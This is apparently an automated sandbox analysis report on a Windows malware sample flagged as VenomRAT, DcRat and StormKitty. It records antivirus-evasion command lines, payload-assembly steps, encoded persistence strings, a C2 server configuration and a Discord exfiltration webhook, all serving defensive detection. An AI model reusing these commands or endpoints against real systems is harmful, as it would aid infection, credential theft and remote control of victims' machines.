
Windows Analysis Report
OR8Ti8rf8h.exe

Overview

General Information

Sample name: OR8Ti8rf8h.exe (renamed because the original name is a hash value)
Original sample name: af9cd831104a7d0a352cd88f77a4cfbdde43804b5225002fc7115685d2c6297f.exe
Analysis ID: 1573646
MD5: 6681713c421e1b4951d5a08c39f43e97
SHA1: 23c09997b6cac46683950dbbefa18d65b3250d12
SHA256: af9cd831104a7d0a352cd88f77a4cfbdde43804b5225002fc7115685d2c6297f
Tags: exepdfviewfilesmetascan-comuser-JAMESWT_MHT

Detection

AveMaria, DcRat, StormKitty, VenomRAT
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Search for Antivirus process
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected AveMaria stealer
Yara detected BrowserPasswordDump
Yara detected DcRat
Yara detected Powershell download and execute
Yara detected StormKitty Stealer
Yara detected VenomRAT
AI detected suspicious sample
Drops PE files with a suspicious file extension
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Bad Opsec Defaults Sacrificial Processes With Improper Arguments
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes many files with high entropy
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Copy From or To System Directory
Uses 32bit PE files
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • OR8Ti8rf8h.exe (PID: 8024 cmdline: "C:\Users\user\Desktop\OR8Ti8rf8h.exe" MD5: 6681713C421E1B4951D5A08C39F43E97)
    • cmd.exe (PID: 8144 cmdline: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 8152 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • tasklist.exe (PID: 7196 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7236 cmdline: findstr /I "wrsa opssvc" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • tasklist.exe (PID: 7368 cmdline: tasklist MD5: 0A4448B31CE7F83CB7691A2657F330F1)
      • findstr.exe (PID: 7396 cmdline: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7516 cmdline: cmd /c md 585711 MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • findstr.exe (PID: 7592 cmdline: findstr /V "ComplyFailuresGuardsDomInvolvementRadarScreensKidney" Tonight MD5: F1D4BE0E99EC734376FDE474A8D4EA3E)
      • cmd.exe (PID: 7588 cmdline: cmd /c copy /b ..\Solaris + ..\Harassment + ..\Proudly + ..\Turned + ..\Viruses + ..\Wallpapers + ..\Usc + ..\Crm + ..\Ribbon + ..\Confident + ..\Angle + ..\Alumni + ..\Fees + ..\Reserve + ..\Reflected + ..\Include + ..\Specialist + ..\Respondent + ..\False + ..\Assume + ..\Regardless + ..\Mary + ..\Consecutive + ..\Movers + ..\Scottish + ..\Holocaust + ..\Experience + ..\Phrase + ..\Started + ..\Disturbed + ..\Needle + ..\Pipes + ..\Hollow + ..\Spelling + ..\Reed + ..\Tft + ..\Specialties Y MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • Depression.com (PID: 5428 cmdline: Depression.com Y MD5: 62D09F076E6E0240548C2F837536A46A)
        • RegAsm.exe (PID: 6180 cmdline: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe MD5: 0D5DF43AF2916F47D00C1573797C1A13)
      • choice.exe (PID: 6800 cmdline: choice /d y /t 5 MD5: FCE0E41C87DC4ABBE976998AD26C27E4)
Name: Ave Maria, AveMariaRAT, avemaria
Description: Information stealer which uses AutoIT for wrapping.
Attribution: Anunak
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria

Name: DCRat
Description: DCRat is a typical RAT that has been around since at least June 2019.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name: Cameleon, StormKitty
Description: PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon
Extracted VenomRAT configuration: {"Server": "208.115.220.58", "Port": "4449", "Version": "RAT + hVNC  6.0.5", "MutexName": "mrpejlowfvqhtkxwj", "Autorun": "false", "Group": "false"}
Yara matches in memory dumps (Source; Rule; Description; Author):
  • Source: 0000000E.00000002.2630405640.00000000035F2000.00000004.00000800.00020000.00000000.sdmp; Rule: JoeSecurity_DcRat_2; Description: Yara detected DcRat; Author: Joe Security
  • Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_VenomRAT; Description: Yara detected VenomRAT; Author: Joe Security
  • Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_StormKitty; Description: Yara detected StormKitty Stealer; Author: Joe Security
  • Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
  • Source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; Rule: JoeSecurity_BrowserPasswordDump_1; Description: Yara detected BrowserPasswordDump; Author: Joe Security
Yara matches in unpacked PE files (Source; Rule; Description; Author; Strings):
  • Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack; Rule: JoeSecurity_VenomRAT; Description: Yara detected VenomRAT; Author: Joe Security
  • Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack; Rule: JoeSecurity_CredentialStealer; Description: Yara detected Credential Stealer; Author: Joe Security
  • Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack; Rule: JoeSecurity_GenericDownloader_1; Description: Yara detected Generic Downloader; Author: Joe Security
  • Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack; Rule: JoeSecurity_BrowserPasswordDump_1; Description: Yara detected BrowserPasswordDump; Author: Joe Security
  • Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack; Rule: Windows_Trojan_DCRat_1aeea1ac; Description: unknown; Author: unknown; Strings:
    • 0x11d67e:$a1: havecamera
    • 0x1684a8:$a2: timeout 3 > NUL
    • 0x16b82b:$a3: START "" "
    • 0x16bd40:$a3: START "" "
    • 0x16bc1b:$a4: L2Mgc2NodGFza3MgL2NyZWF0ZSAvZiAvc2Mgb25sb2dvbiAvcmwgaGlnaGVzdCAvdG4g
    • 0x16bcb8:$a5: U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVuXA==

System Summary

Source: Process started; Author: Oleg Kolesnikov @securonix invrep_de, oscd.community, Florian Roth (Nextron Systems), Christian Burkard (Nextron Systems); Data: Command: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, ParentCommandLine: Depression.com Y, ParentImage: C:\Users\user\AppData\Local\Temp\585711\Depression.com, ParentProcessId: 5428, ParentProcessName: Depression.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, ProcessId: 6180, ProcessName: RegAsm.exe
Source: Process started; Author: Nasreddine Bencherchali (Nextron Systems); Data: Command: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, CommandLine: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, ParentCommandLine: Depression.com Y, ParentImage: C:\Users\user\AppData\Local\Temp\585711\Depression.com, ParentProcessId: 5428, ParentProcessName: Depression.com, ProcessCommandLine: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exe, ProcessId: 6180, ProcessName: RegAsm.exe
Source: Process started; Author: Florian Roth (Nextron Systems), Markus Neis, Tim Shelton (HAWK.IO), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd, CommandLine: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\OR8Ti8rf8h.exe", ParentImage: C:\Users\user\Desktop\OR8Ti8rf8h.exe, ParentProcessId: 8024, ParentProcessName: OR8Ti8rf8h.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd, ProcessId: 8144, ProcessName: cmd.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started; Author: Joe Security; Data: Command: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Frames Frames.cmd && Frames.cmd, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8144, ParentProcessName: cmd.exe, ProcessCommandLine: findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" , ProcessId: 7396, ProcessName: findstr.exe

Suricata IDS alert:
  • Timestamp: 2024-12-12T12:39:15.665492+0100
  • SID: 2842478
  • Severity: 1
  • Classtype: Malware Command and Control Activity Detected
  • Source IP: 208.115.220.58
  • Source port: 4449
  • Destination IP: 192.168.2.7
  • Destination port: 49843
  • Protocol: TCP

AV Detection

Source: 0000000E.00000002.2630405640.0000000003421000.00000004.00000800.00020000.00000000.sdmp; Malware Configuration Extractor: VenomRAT {"Server": "208.115.220.58", "Port": "4449", "Version": "RAT + hVNC 6.0.5", "MutexName": "mrpejlowfvqhtkxwj", "Autorun": "false", "Group": "false"}
Source: OR8Ti8rf8h.exe; ReversingLabs: Detection: 21%
Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: Submitted sample; Integrated Neural Analysis Model: Matched 92.0% probability
Source: OR8Ti8rf8h.exe; Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: OR8Ti8rf8h.exe; Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 11.30.2024\HVNCDll\obj\Release\hvnc.pdbP source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: RegAsm.pdb source: RegAsm.exe, 0000000E.00000000.1908601175.0000000000D92000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe.11.dr
Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 0000000E.00000000.1908601175.0000000000D92000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe.11.dr
Source: Binary string: D:\Backup\Venom RAT + HVNC Finally Released 11.30.2024\HVNCDll\obj\Release\hvnc.pdb source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; Code function: 0_2_00406301 FindFirstFileW,FindClose,0_2_00406301
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; Code function: 0_2_00406CC7 DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,0_2_00406CC7
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\AppData\Local\Temp\585711
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\AppData\Local\Temp\585711\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\AppData\Local\Temp\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\AppData\Local\
Source: C:\Windows\SysWOW64\cmd.exe; File opened: C:\Users\user~1\AppData\

Networking

Source: Network traffic; Suricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 208.115.220.58:4449 -> 192.168.2.7:49843
Source: Yara match; File source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
Source: global traffic; TCP traffic: 192.168.2.7:49843 -> 208.115.220.58:4449
Source: Joe Sandbox View; ASN Name: LIMESTONENETWORKSUS LIMESTONENETWORKSUS
Source: unknown; TCP traffic detected without corresponding DNS query: 208.115.220.58
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic; DNS traffic detected: DNS query: time.windows.com
Source: global traffic; DNS traffic detected: DNS query: iLAKhXCSlkKKBvjaNGAojhxfYe.iLAKhXCSlkKKBvjaNGAojhxfYe
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: RegAsm.exe, 0000000E.00000002.2633955559.0000000005930000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingCAR36.crl0z
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://crl.sectigo.com/SectigoPublicTimeStampingRootR46.crl0
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingCAR36.crt0#
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://crt.sectigo.com/SectigoPublicTimeStampingRootR46.p7c0#
Source: RegAsm.exe, 0000000E.00000002.2629872593.0000000001807000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: RegAsm.exe, 0000000E.00000002.2633955559.0000000005930000.00000004.00000020.00020000.00000000.sdmp, 77EC63BDA74BD0D0E0426DC8F80085060.14.dr; String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://ipinfo.io/ip
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://james.newtonking.com/projects/json
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://ocsp.comodoca.com0
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://ocsp.sectigo.com0
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://ocsp.sectigo.com0D
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://ocsp2.globalsign.com/rootr306
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: RegAsm.exe, 0000000E.00000002.2630405640.0000000003421000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: Depression.com, 0000000B.00000000.1425868665.00000000010D5000.00000002.00000001.01000000.00000007.sdmp, Managed.0.dr, Depression.com.2.dr; String found in binary or memory: http://www.autoitscript.com/autoit3/X
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: OR8Ti8rf8h.exe; String found in binary or memory: http://www.softland.ro0/
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://discordapp.com/api/v6/users/
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: OR8Ti8rf8h.exe; String found in binary or memory: https://sectigo.com/CPS0
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://urn.to/r/sds_see
Source: RegAsm.exe, 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp; String found in binary or memory: https://urn.to/r/sds_seeaCould
Source: Depression.com.2.dr, Ada.0.dr; String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: Ada.0.dr; String found in binary or memory: https://www.globalsign.com/repository/0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match; File source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000E.00000002.2629293985.0000000001172000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; Code function: 0_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050F9
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; Code function: 0_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044D1

E-Banking Fraud

Source: Yara match; File source: Process Memory Space: RegAsm.exe PID: 6180, type: MEMORYSTR

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Viruses, entropy: 7.99822982573
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\False, entropy: 7.99689272878
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Regardless, entropy: 7.99715475135
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Phrase, entropy: 7.99741027527
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Proudly, entropy: 7.99707385539
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Experience, entropy: 7.9972652898
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Reserve, entropy: 7.99724135879
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Needle, entropy: 7.99777189205
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Mary, entropy: 7.99775540186
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Disturbed, entropy: 7.99676919368
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Turned, entropy: 7.99721220613
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Solaris, entropy: 7.99769657464
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Consecutive, entropy: 7.99685491078
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Confident, entropy: 7.99774835652
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Pipes, entropy: 7.99732276667
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Fees, entropy: 7.99803927966
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Movers, entropy: 7.9975454896
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Ribbon, entropy: 7.99772369059
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Include, entropy: 7.99824280401
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Reed, entropy: 7.9970905642
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Alumni, entropy: 7.99782896822
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Hollow, entropy: 7.99685426093
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Assume, entropy: 7.99763847749
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Wallpapers, entropy: 7.99799189457
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Specialist, entropy: 7.99728573595
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Scottish, entropy: 7.9980673954
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Reflected, entropy: 7.99680752846
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Respondent, entropy: 7.99841111859
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Crm, entropy: 7.99834438399
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Spelling, entropy: 7.99753094835
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Harassment, entropy: 7.99810730566
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Usc, entropy: 7.99792599778
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Tft, entropy: 7.99754854098
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Specialties, entropy: 7.99641949893
Source: C:\Users\user\Desktop\OR8Ti8rf8h.exe; File created: C:\Users\user\AppData\Local\Temp\Holocaust, entropy: 7.99842487997
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Started entropy: 7.9971176372Jump to dropped file
                    Source: C:\Users\user\Desktop\OR8Ti8rf8h.exeFile created: C:\Users\user\AppData\Local\Temp\Angle entropy: 7.99700636245Jump to dropped file
                    Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\585711\Y entropy: 7.99993092407Jump to dropped file
                    Source: C:\Users\user\AppData\Local\Temp\585711\RegAsm.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 entropy: 7.99661776995Jump to dropped file

                    System Summary

                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac | Author: unknown
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Discord tokens regular expressions | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1295b8a.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects AsyncRAT | Author: ditekSHen
                    Source: 14.2.RegAsm.exe.1170000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_DCRat_1aeea1ac | Author: unknown
